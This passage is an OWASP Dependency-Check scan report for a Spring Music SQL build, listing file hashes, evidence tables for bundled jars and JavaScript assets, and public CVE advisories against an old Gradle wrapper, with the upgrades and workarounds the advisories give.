Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies;
false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and
the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties,
implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided
is at the user’s risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever
arising out of or in connection with the use of this tool, the analysis performed, or the resulting report.
Scan Information:
dependency-check version: 12.1.3
Report Generated On: Sun, 20 Jul 2025 01:54:42 GMT
Dependencies Scanned: 412 (376 unique)
Vulnerable Dependencies: 53
Vulnerabilities Found: 479
Vulnerabilities Suppressed: 0
...
NVD API Last Checked: 2025-07-19T11:38:01Z
NVD API Last Modified: 2025-07-19T11:15:22Z
NVD Cache Last Checked: 2025-07-19T11:38:01Z
NVD Cache Last Modified: 2025-07-19T11:15:22Z

Summary
Summary of Vulnerable Dependencies
* indicates the dependency has a known exploited vulnerability
albums.js
File Path: /github/workspace/build/resources/main/static/js/albums.js
MD5: b6df3deaf2b0bff56b50ca6fd50d71ef
SHA1: 5cae9c51e15021bb51fcbb99f7a25ae14aacb93a
SHA256: 02aa785ae28edecf76f122b74842fdb457b75453dc98c2ded200605b1df18332

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|

Related Dependencies:
* albums.js (File Path: /github/workspace/src/main/resources/static/js/albums.js; MD5: b6df3deaf2b0bff56b50ca6fd50d71ef; SHA1: 5cae9c51e15021bb51fcbb99f7a25ae14aacb93a; SHA256: 02aa785ae28edecf76f122b74842fdb457b75453dc98c2ded200605b1df18332)
* spring-music-sqldb-1.0.jar: albums.js (File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/classes/static/js/albums.js; MD5: b6df3deaf2b0bff56b50ca6fd50d71ef; SHA1: 5cae9c51e15021bb51fcbb99f7a25ae14aacb93a; SHA256: 02aa785ae28edecf76f122b74842fdb457b75453dc98c2ded200605b1df18332)

app.js
File Path: /github/workspace/build/resources/main/static/js/app.js
MD5: c56a39bb605832ad75abebdc4b700585
SHA1: e8047478e12c01fcd89e38d249aad4990b98cb45
SHA256: 65b52c17592b496f6941156c48bf1fa2797538311f247395e621fe4cf037f142

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|

Related Dependencies:
* app.js (File Path: /github/workspace/src/main/resources/static/js/app.js; MD5: c56a39bb605832ad75abebdc4b700585; SHA1: e8047478e12c01fcd89e38d249aad4990b98cb45; SHA256: 65b52c17592b496f6941156c48bf1fa2797538311f247395e621fe4cf037f142)
* spring-music-sqldb-1.0.jar: app.js (File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/classes/static/js/app.js; MD5: c56a39bb605832ad75abebdc4b700585; SHA1: e8047478e12c01fcd89e38d249aad4990b98cb45; SHA256: 65b52c17592b496f6941156c48bf1fa2797538311f247395e621fe4cf037f142)

errors.js
File Path: /github/workspace/build/resources/main/static/js/errors.js
MD5: 22ba03b9ba7a4deab4d4545bd02b464c
SHA1: f31d03be28698f9450bc1609ba37034f30665d57
SHA256: 03efda7955d3e99b8067d6d27c97dc14ae638fbcbe83c728edd7f6e35f7b1c35

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|

Related Dependencies:
* errors.js (File Path: /github/workspace/src/main/resources/static/js/errors.js; MD5: 22ba03b9ba7a4deab4d4545bd02b464c; SHA1: f31d03be28698f9450bc1609ba37034f30665d57; SHA256: 03efda7955d3e99b8067d6d27c97dc14ae638fbcbe83c728edd7f6e35f7b1c35)
* spring-music-sqldb-1.0.jar: errors.js (File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/classes/static/js/errors.js; MD5: 22ba03b9ba7a4deab4d4545bd02b464c; SHA1: f31d03be28698f9450bc1609ba37034f30665d57; SHA256: 03efda7955d3e99b8067d6d27c97dc14ae638fbcbe83c728edd7f6e35f7b1c35)

gradle-wrapper.jar
File Path: /github/workspace/gradle/wrapper/gradle-wrapper.jar
MD5: 83e4276503aa8ca4e50b4221e406c214
SHA1: 9454732292541339b18084df0bdba55b027af937
SHA256: 88b5b31f390a268ab3773df580d83fd1e388f49c2b685f78a16600577bd72fe2

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | gradle-wrapper | High |
| Vendor | jar | package name | cli | Low |
| Vendor | jar | package name | gradle | Low |
| Product | file | name | gradle-wrapper | High |
| Product | jar | package name | cli | Low |
| Product | jar | package name | gradle | Highest |
| Product | Manifest | Implementation-Title | Gradle | High |
| Version | Manifest | Implementation-Version | 4.4 | High |
CVE-2019-15052
The HTTP client in Gradle before 5.6 sends authentication credentials originally destined for the configured host. If that host returns a 30x redirect, Gradle also sends those credentials to all subsequent hosts that the request redirects to. This is similar to CVE-2018-1000007.
CWE-522 Insufficiently Protected Credentials
CVSSv3: Base Score: CRITICAL (9.8), Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0), Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References:
* af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT, ISSUE_TRACKING, THIRD_PARTY_ADVISORY
* af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT, THIRD_PARTY_ADVISORY
* af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING, PATCH, THIRD_PARTY_ADVISORY
* cve@mitre.org - EXPLOIT, ISSUE_TRACKING, THIRD_PARTY_ADVISORY
* cve@mitre.org - EXPLOIT, THIRD_PARTY_ADVISORY
* cve@mitre.org - ISSUE_TRACKING, PATCH, THIRD_PARTY_ADVISORY
Vulnerable Software & Versions:
CVE-2023-35947
Gradle is a build tool with a focus on build automation and support for multi-language development. In affected versions when unpacking Tar archives, Gradle did not check that files could be written outside of the unpack location. This could lead to important files being overwritten anywhere the Gradle process has write permissions. For a build reading Tar entries from a Tar archive, this issue could allow Gradle to disclose information from sensitive files through an arbitrary file read. To exploit this behavior, an attacker needs to either control the source of an archive already used by the build or modify the build to interact with a malicious archive. It is unlikely that this would go unnoticed. A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Starting from these versions, Gradle will refuse to handle Tar archives which contain path traversal elements in a Tar entry name. Users are advised to upgrade. There are no known workarounds for this vulnerability.
### Impact
This is a path traversal vulnerability when Gradle deals with Tar archives, often referenced as TarSlip, a variant of ZipSlip.
* When unpacking Tar archives, Gradle did not check that files could be written outside of the unpack location. This could lead to important files being overwritten anywhere the Gradle process has write permissions.
* For a build reading Tar entries from a Tar archive, this issue could allow Gradle to disclose information from sensitive files through an arbitrary file read.
To exploit this behavior, an attacker needs to either control the source of an archive already used by the build or modify the build to interact with a malicious archive. It is unlikely that this would go unnoticed.
Gradle uses Tar archives for its [Build Cache](https://docs.gradle.org/current/userguide/build_cache.html). These archives are safe when created by Gradle. But if an attacker had control of a remote build cache server, they could inject malicious build cache entries that leverage this vulnerability. This attack vector could also be exploited if a man-in-the-middle can be performed between the remote cache and the build.
### Patches
A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Starting from these versions, Gradle will refuse to handle Tar archives which contain path traversal elements in a Tar entry name.
It is recommended that users upgrade to a patched version.
### Workarounds
There is no workaround.
* If your build deals with Tar archives that you do not fully trust, you need to inspect them to confirm they do not attempt to leverage this vulnerability.
* If you use the Gradle remote build cache, make sure only trusted parties have write access to it and that connections to the remote cache are properly secured.
### References
* [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](https://cwe.mitre.org/data/definitions/22.html)
* [Gradle Build Cache](https://docs.gradle.org/current/userguide/build_cache.html)
* [ZipSlip](https://security.snyk.io/research/zip-slip-vulnerability)
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSSv3: Base Score: HIGH (8.1), Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2021-29428
In Gradle before version 7.0, on Unix-like systems, the system temporary directory can be created with open permissions that allow multiple users to create and delete files within it. Gradle builds could be vulnerable to a local privilege escalation from an attacker quickly deleting and recreating files in the system temporary directory. This vulnerability impacted builds using precompiled script plugins written in Kotlin DSL and tests for Gradle plugins written using ProjectBuilder or TestKit. If you are on Windows or modern versions of macOS, you are not vulnerable. If you are on a Unix-like operating system with the "sticky" bit set on your system temporary directory, you are not vulnerable. The problem has been patched and released with Gradle 7.0. As a workaround, on Unix-like operating systems, ensure that the "sticky" bit is set. This only allows the original user (or root) to delete a file. If you are unable to change the permissions of the system temporary directory, you can move the Java temporary directory by setting the System Property `java.io.tmpdir`. The new path needs to limit permissions to the build user only. For additional details refer to the referenced GitHub Security Advisory.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Insecure Permissions
CVSSv3: Base Score: HIGH (7.8), Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.4), Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2020-11979
As mitigation for CVE-2020-1945 Apache Ant 1.10.8 changed the permissions of temporary files it created so that only the current user was allowed to access them. Unfortunately the fixcrlf task deleted the temporary file and created a new one without said protection, effectively nullifying the effort. This would still allow an attacker to inject modified source files into the build process.
CWE-379 Creation of Temporary File in Directory with Insecure Permissions, NVD-CWE-Other
CVSSv3: Base Score: HIGH (7.5), Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0), Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
References:
* af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST, VENDOR_ADVISORY
* af854a3a-2127-422b-91ae-364da2661108 - PATCH, THIRD_PARTY_ADVISORY
* af854a3a-2127-422b-91ae-364da2661108 - PATCH, THIRD_PARTY_ADVISORY
* af854a3a-2127-422b-91ae-364da2661108 - PATCH, THIRD_PARTY_ADVISORY
* af854a3a-2127-422b-91ae-364da2661108 - PATCH, THIRD_PARTY_ADVISORY
* af854a3a-2127-422b-91ae-364da2661108 - PATCH, THIRD_PARTY_ADVISORY
* af854a3a-2127-422b-91ae-364da2661108 - PATCH, THIRD_PARTY_ADVISORY
* af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY
* af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY
* security@apache.org - MAILING_LIST, VENDOR_ADVISORY
* security@apache.org - PATCH, THIRD_PARTY_ADVISORY
* security@apache.org - PATCH, THIRD_PARTY_ADVISORY
* security@apache.org - PATCH, THIRD_PARTY_ADVISORY
* security@apache.org - PATCH, THIRD_PARTY_ADVISORY
* security@apache.org - PATCH, THIRD_PARTY_ADVISORY
* security@apache.org - PATCH, THIRD_PARTY_ADVISORY
* security@apache.org - THIRD_PARTY_ADVISORY
* security@apache.org - THIRD_PARTY_ADVISORY
Vulnerable Software & Versions:
CVE-2021-32751
Gradle is a build tool with a focus on build automation. In versions prior to 7.2, start scripts generated by the `application` plugin and the `gradlew` script are both vulnerable to arbitrary code execution when an attacker is able to change environment variables for the user running the script. This may impact those who use `gradlew` on Unix-like systems or use the scripts generated by Gradle in their application on Unix-like systems. For this vulnerability to be exploitable, an attacker needs to be able to set the value of particular environment variables and have those environment variables be seen by the vulnerable scripts. This issue has been patched in Gradle 7.2 by removing the use of `eval` and requiring the use of the `bash` shell. There are a few workarounds available. For CI/CD systems using the Gradle build tool, one may ensure that untrusted users are unable to change environment variables for the user that executes `gradlew`. If one is unable to upgrade to Gradle 7.2, one may generate a new `gradlew` script with Gradle 7.2 and use it for older versions of Gradle. For applications using start scripts generated by Gradle, one may ensure that untrusted users are unable to change environment variables for the user that executes the start script. A vulnerable start script could be manually patched to remove the use of `eval` or the use of environment variables that affect the application's command-line. If the application is simple enough, one may be able to avoid the use of the start scripts by running the application directly with the Java command.
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSSv3: Base Score: HIGH (7.5), Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A
CVSSv2: Base Score: HIGH (8.5), Vector: /AV:N/AC:M/Au:S/C:C/I:C/A:C
References:
Vulnerable Software & Versions:
CVE-2023-44387
Gradle is a build tool with a focus on build automation and support for multi-language development. When copying or archiving symlinked files, Gradle resolves them but applies the permissions of the symlink itself instead of the permissions of the linked file to the resulting file. This leads to files having too much permissions given that symlinks usually are world readable and writeable. While it is unlikely this results in a direct vulnerability for the impacted build, it may open up attack vectors depending on where build artifacts end up being copied to or un-archived. In versions 7.6.3, 8.4 and above, Gradle will now properly use the permissions of the file pointed at by the symlink to set permissions of the copied or archived file.
CWE-732 Incorrect Permission Assignment for Critical Resource
CVSSv3: Base Score: MEDIUM (6.5), Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:2.0/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2019-11065
Gradle versions from 1.4 to 5.3.1 use an insecure HTTP URL to download dependencies when the built-in JavaScript or CoffeeScript Gradle plugins are used. Dependency artifacts could have been maliciously compromised by a MITM attack against the ajax.googleapis.com web site.
NVD-CWE-noinfo
CVSSv3: Base Score: MEDIUM (5.9), Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3), Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2019-16370
The PGP signing plugin in Gradle before 6.0 relies on the SHA-1 algorithm, which might allow an attacker to replace an artifact with a different one that has the same SHA-1 message digest, a related issue to CVE-2005-4900.
CWE-327 Use of a Broken or Risky Cryptographic Algorithm
CVSSv3: Base Score: MEDIUM (5.9), Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3), Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2021-29429
In Gradle before version 7.0, files created with open permissions in the system temporary directory can allow an attacker to access information downloaded by Gradle. Some builds could be vulnerable to a local information disclosure. Remote files accessed through TextResourceFactory are downloaded into the system temporary directory first. Sensitive information contained in these files can be exposed to other local users on the same system. If you do not use the `TextResourceFactory` API, you are not vulnerable. As of Gradle 7.0, uses of the system temporary directory have been moved to the Gradle User Home directory. By default, this directory is restricted to the user running the build. As a workaround, set a more restrictive umask that removes read access to other users. When files are created in the system temporary directory, they will not be accessible to other users. If you are unable to change your system's umask, you can move the Java temporary directory by setting the System Property `java.io.tmpdir`. The new path needs to limit permissions to the build user only.
CWE-377 Insecure Temporary File
CVSSv3: Base Score: MEDIUM (5.5), Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:1.8/RC:R/MAV:A
CVSSv2: Base Score: LOW (1.9), Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2023-35946
Gradle is a build tool with a focus on build automation and support for multi-language development. When Gradle writes a dependency into its dependency cache, it uses the dependency's coordinates to compute a file location. With specially crafted dependency coordinates, Gradle can be made to write files into an unintended location. The file may be written outside the dependency cache or over another file in the dependency cache. This vulnerability could be used to poison the dependency cache or overwrite important files elsewhere on the filesystem where the Gradle process has write permissions. Exploiting this vulnerability requires an attacker to have control over a dependency repository used by the Gradle build or have the ability to modify the build's configuration. It is unlikely that this would go unnoticed. A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Gradle will refuse to cache dependencies that have path traversal elements in their dependency coordinates. It is recommended that users upgrade to a patched version. If you are unable to upgrade to Gradle 7.6.2 or 8.2, `dependency verification` will make this vulnerability more difficult to exploit.
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSSv3: Base Score: MEDIUM (5.5), Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N/E:1.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2023-42445
Gradle is a build tool with a focus on build automation and support for multi-language development. In some cases, when Gradle parses XML files, resolving XML external entities is not disabled. Combined with an Out Of Band XXE attack (OOB-XXE), just parsing XML can lead to exfiltration of local text files to a remote server. Gradle parses XML files for several purposes. Most of the time, Gradle parses XML files it generated or were already present locally. Only Ivy XML descriptors and Maven POM files can be fetched from remote repositories and parsed by Gradle. In Gradle 7.6.3 and 8.4, resolving XML external entities has been disabled for all use cases to protect against this vulnerability. Gradle will now refuse to parse XML files that have XML external entities.
CWE-611 Improper Restriction of XML External Entity Reference
CVSSv3: Base Score: MEDIUM (5.3), Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N/E:1.6/RC:R/MAV:A
References:
Vulnerable Software & Versions:
info.js
File Path: /github/workspace/build/resources/main/static/js/info.js
MD5: 26f4537eebc0c44b3b5768822f588bd4
SHA1: 8b9b14b5e86740cc17a5ec1f75b544bc38c26324
SHA256: 8a8c3235f45f5ef27de6fdfee9a25970ab9bfa8fb7eb4fbc14f7ffb91bef7360

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|

Related Dependencies:
* info.js (File Path: /github/workspace/src/main/resources/static/js/info.js; MD5: 26f4537eebc0c44b3b5768822f588bd4; SHA1: 8b9b14b5e86740cc17a5ec1f75b544bc38c26324; SHA256: 8a8c3235f45f5ef27de6fdfee9a25970ab9bfa8fb7eb4fbc14f7ffb91bef7360)
* spring-music-sqldb-1.0.jar: info.js (File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/classes/static/js/info.js; MD5: 26f4537eebc0c44b3b5768822f588bd4; SHA1: 8b9b14b5e86740cc17a5ec1f75b544bc38c26324; SHA256: 8a8c3235f45f5ef27de6fdfee9a25970ab9bfa8fb7eb4fbc14f7ffb91bef7360)

jacocoagent.jar (shaded: org.jacoco:org.jacoco.agent.rt:0.8.9)
Description: JaCoCo Java Agent
File Path: /github/workspace/build/tmp/expandedArchives/org.jacoco.agent-0.8.9.jar_3a0f8c0154949e09129394b57a7a1563/jacocoagent.jar/META-INF/maven/org.jacoco/org.jacoco.agent.rt/pom.xml
MD5: 06f8be91bf1dee590f62342c16f4cb5e
SHA1: b76c6513056458a597ff2fee17812306d1517b1d
SHA256: d1e4d1e96612c192aa62af1e4fb053720b74b890d38b5cec03bc4a0fa62b58b2

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | pom | artifactid | jacoco.agent.rt | Low |
| Vendor | pom | groupid | org.jacoco | Highest |
| Vendor | pom | name | JaCoCo :: Agent RT | High |
| Vendor | pom | parent-artifactid | org.jacoco.build | Low |
| Product | pom | artifactid | jacoco.agent.rt | Highest |
| Product | pom | groupid | org.jacoco | Highest |
| Product | pom | name | JaCoCo :: Agent RT | High |
| Product | pom | parent-artifactid | org.jacoco.build | Medium |
| Version | pom | version | 0.8.9 | Highest |

jacocoagent.jar (shaded: org.jacoco:org.jacoco.core:0.8.9)
Description: JaCoCo Core
File Path: /github/workspace/build/tmp/expandedArchives/org.jacoco.agent-0.8.9.jar_3a0f8c0154949e09129394b57a7a1563/jacocoagent.jar/META-INF/maven/org.jacoco/org.jacoco.core/pom.xml
MD5: a289ecd9035330a8892a80e3eb53c046
SHA1: 04abbbb943140ca9f7f6c029eb554c38b7f40c1f
SHA256: 5404f7052765a64374d275367fd9485bb5996b369113c89a8557d8f024810f02

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | pom | artifactid | jacoco.core | Low |
| Vendor | pom | groupid | org.jacoco | Highest |
| Vendor | pom | name | JaCoCo :: Core | High |
| Vendor | pom | parent-artifactid | org.jacoco.build | Low |
| Product | pom | artifactid | jacoco.core | Highest |
| Product | pom | groupid | org.jacoco | Highest |
| Product | pom | name | JaCoCo :: Core | High |
| Product | pom | parent-artifactid | org.jacoco.build | Medium |
| Version | pom | version | 0.8.9 | Highest |

jacocoagent.jar
Description: JaCoCo Agent
File Path: /github/workspace/build/tmp/expandedArchives/org.jacoco.agent-0.8.9.jar_3a0f8c0154949e09129394b57a7a1563/jacocoagent.jar
MD5: e852c5e07bc13ffdc6a68303799f80ad
SHA1: ad836d1c585c7e1dbf5cf828efa34528d9700303
SHA256: 191734a0b7ef97606e6a09ae584c4acab47eb30fcb4c555d3d440d4e0d71d73d

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | central | artifactid | org.jacoco.agent | Highest |
| Vendor | central | groupid | org.jacoco | Highest |
| Vendor | file | name | jacocoagent | High |
| Vendor | jar | package name | agent | Highest |
| Vendor | jar | package name | agent | Low |
| Vendor | jar | package name | jacoco | Highest |
| Vendor | jar | package name | jacoco | Low |
| Vendor | jar | package name | rt | Highest |
| Vendor | jar | package name | rt | Low |
| Vendor | Manifest | automatic-module-name | org.jacoco.agent.rt | Medium |
| Vendor | Manifest | Implementation-Vendor | Mountainminds GmbH & Co. KG | High |
| Vendor | pom | artifactid | jacoco.agent | Low |
| Vendor | pom | groupid | org.jacoco | Highest |
| Vendor | pom | name | JaCoCo :: Agent | High |
| Vendor | pom | parent-artifactid | org.jacoco.build | Low |
| Product | central | artifactid | org.jacoco.agent | Highest |
| Product | file | name | jacocoagent | High |
| Product | jar | package name | agent | Highest |
| Product | jar | package name | agent | Low |
| Product | jar | package name | internal_4481564 | Low |
| Product | jar | package name | jacoco | Highest |
| Product | jar | package name | rt | Highest |
| Product | jar | package name | rt | Low |
| Product | Manifest | automatic-module-name | org.jacoco.agent.rt | Medium |
| Product | Manifest | Implementation-Title | JaCoCo Java Agent | High |
| Product | pom | artifactid | jacoco.agent | Highest |
| Product | pom | groupid | org.jacoco | Highest |
| Product | pom | name | JaCoCo :: Agent | High |
| Product | pom | parent-artifactid | org.jacoco.build | Medium |
| Version | central | version | 0.8.9 | Highest |
| Version | Manifest | Implementation-Version | 0.8.9 | High |
| Version | pom | version | 0.8.9 | Highest |
prettify.js
File Path: /github/workspace/build/reports/jacoco/test/html/jacoco-resources/prettify.js
MD5: 4b337aaa3c606cfc1a6ff1986db2c8cb
SHA1: 290093755739da933c180ae7e7ebf283724dad1d
SHA256: 743c6c4cab9499cd0bfe18a5a62281eccce843f47ec75eedb32eeb29c755aa68

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|

report.js
File Path: /github/workspace/build/reports/tests/test/js/report.js
MD5: de20378567ed128a8084bb84fa9a704c
SHA1: e00fae3553098953945837c2dce0634b35ab1932
SHA256: fc89c6d002d18f4662065c9887b2cda8f8486f2737d4ad0f2fdeac0ad58a44dc

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|

sort.js
File Path: /github/workspace/build/reports/jacoco/test/html/jacoco-resources/sort.js
MD5: d101d06d26e7deaf2b224e0d2137509a
SHA1: 2c715325b546adf5beff3d624ce002a7256e3efe
SHA256: 7ff293dabc89d68e33d5611f2de0dbbbcfed7e0177726fab5f9dcc0b91f593af

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|

spring-music-sqldb-1.0.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar
MD5: 9399b9a2ee7605612929440071956bd3
SHA1: 480c4de8ee58776b45a92907c15c8ea5523d318d
SHA256: 572d327d25e8fba4d656f49415e70b7657c3424e63bf440c305a2305ef6cf43f

| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | spring-music-sqldb | High |
| Vendor | jar | package name | boot | Low |
| Vendor | jar | package name | loader | Low |
| Vendor | jar | package name | springframework | Low |
| Product | file | name | spring-music-sqldb | High |
| Product | jar | package name | boot | Low |
| Product | jar | package name | loader | Low |
| Version | file | name | spring-music-sqldb | Medium |
| Version | file | version | 1.0 | High |
spring-music-sqldb-1.0.jar: HdrHistogram-2.1.10.jar
Description:
HdrHistogram supports the recording and analyzing sampled data value
counts across a configurable integer value range with configurable value
precision within the range. Value precision is expressed as the number of
significant digits in the value recording, and provides control over value
quantization behavior across the value range and the subsequent value
resolution at any given level.
License:
Public Domain, per Creative Commons CC0: http://creativecommons.org/publicdomain/zero/1.0/
BSD-2-Clause: https://opensource.org/licenses/BSD-2-Clause
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/HdrHistogram-2.1.10.jar
MD5: f7fd592029a3f8cc3b3c2488d43c6d8d
SHA1: 9e1ac84eed220281841b75e72fb9de5a297fbf04
SHA256: 6a65119ee9372e58b490e889e9f8293802efd3bbc2549dd47b6e1259cd12402c
| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | HdrHistogram | High |
| Vendor | jar | package name | hdrhistogram | Highest |
| Vendor | Manifest | bundle-symbolicname | org.hdrhistogram.HdrHistogram | Medium |
| Vendor | Manifest | Implementation-Vendor-Id | org.hdrhistogram | Medium |
| Vendor | pom | artifactid | HdrHistogram | Low |
| Vendor | pom | developer id | giltene | Medium |
| Vendor | pom | developer name | Gil Tene | Medium |
| Vendor | pom | groupid | org.hdrhistogram | Highest |
| Vendor | pom | name | HdrHistogram | High |
| Vendor | pom | url | http://hdrhistogram.github.io/HdrHistogram/ | Highest |
| Product | file | name | HdrHistogram | High |
| Product | jar | package name | hdrhistogram | Highest |
| Product | Manifest | Bundle-Name | HdrHistogram | Medium |
| Product | Manifest | bundle-symbolicname | org.hdrhistogram.HdrHistogram | Medium |
| Product | Manifest | Implementation-Title | HdrHistogram | High |
| Product | Manifest | specification-title | HdrHistogram | Medium |
| Product | pom | artifactid | HdrHistogram | Highest |
| Product | pom | developer id | giltene | Low |
| Product | pom | developer name | Gil Tene | Low |
| Product | pom | groupid | org.hdrhistogram | Highest |
| Product | pom | name | HdrHistogram | High |
| Product | pom | url | http://hdrhistogram.github.io/HdrHistogram/ | Medium |
| Version | file | version | 2.1.10 | High |
| Version | Manifest | Bundle-Version | 2.1.10 | High |
| Version | Manifest | Implementation-Version | 2.1.10 | High |
| Version | pom | version | 2.1.10 | Highest |
spring-music-sqldb-1.0.jar: HikariCP-2.7.8.jar
Description:
Ultimate JDBC Connection Pool
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/HikariCP-2.7.8.jar
MD5: 2066841de0d44c07a9d1b502f1b6cf94
SHA1: 4a3a604fa2efa89621aa498d04e000b2bed90c39
SHA256: 9e6a79789bcd46ccffe1fc5a92be2b7b94ddc7f538c32f01952536b22d23fd96
| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | HikariCP | High |
| Vendor | jar | package name | hikari | Highest |
| Vendor | jar | package name | pool | Highest |
| Vendor | jar | package name | zaxxer | Highest |
| Vendor | Manifest | automatic-module-name | com.zaxxer.hikari | Medium |
| Vendor | Manifest | bundle-docurl | https://github.com/brettwooldridge | Low |
| Vendor | Manifest | bundle-symbolicname | com.zaxxer.HikariCP | Medium |
| Vendor | pom | artifactid | HikariCP | Low |
| Vendor | pom | developer email | brett.wooldridge@gmail.com | Low |
| Vendor | pom | developer name | Brett Wooldridge | Medium |
| Vendor | pom | groupid | com.zaxxer | Highest |
| Vendor | pom | name | HikariCP | High |
| Vendor | pom | organization name | Zaxxer.com | High |
| Vendor | pom | organization url | brettwooldridge | Medium |
| Vendor | pom | url | brettwooldridge/HikariCP | Highest |
| Product | file | name | HikariCP | High |
| Product | jar | package name | hikari | Highest |
| Product | jar | package name | pool | Highest |
| Product | jar | package name | zaxxer | Highest |
| Product | Manifest | automatic-module-name | com.zaxxer.hikari | Medium |
| Product | Manifest | bundle-docurl | https://github.com/brettwooldridge | Low |
| Product | Manifest | Bundle-Name | HikariCP | Medium |
| Product | Manifest | bundle-symbolicname | com.zaxxer.HikariCP | Medium |
| Product | pom | artifactid | HikariCP | Highest |
| Product | pom | developer email | brett.wooldridge@gmail.com | Low |
| Product | pom | developer name | Brett Wooldridge | Low |
| Product | pom | groupid | com.zaxxer | Highest |
| Product | pom | name | HikariCP | High |
| Product | pom | organization name | Zaxxer.com | Low |
| Product | pom | url | brettwooldridge | High |
| Product | pom | url | brettwooldridge/HikariCP | High |
| Version | file | version | 2.7.8 | High |
| Version | Manifest | Bundle-Version | 2.7.8 | High |
| Version | pom | version | 2.7.8 | Highest |
spring-music-sqldb-1.0.jar: LatencyUtils-2.0.3.jar
Description:
LatencyUtils is a package that provides latency recording and reporting utilities.
License:
Public Domain, per Creative Commons CC0: http://creativecommons.org/publicdomain/zero/1.0/
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/LatencyUtils-2.0.3.jar
MD5: 2ad12e1ef7614cecfb0483fa9ac6da73
SHA1: 769c0b82cb2421c8256300e907298a9410a2a3d3
SHA256: a32a9ffa06b2f4e01c5360f8f9df7bc5d9454a5d373cd8f361347fa5a57165ec
| Evidence Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | LatencyUtils | High |
| Vendor | jar | package name | latencyutils | Highest |
| Vendor | jar | package name | latencyutils | Low |
| Vendor | pom | artifactid | LatencyUtils | Low |
| Vendor | pom | developer id | giltene | Medium |
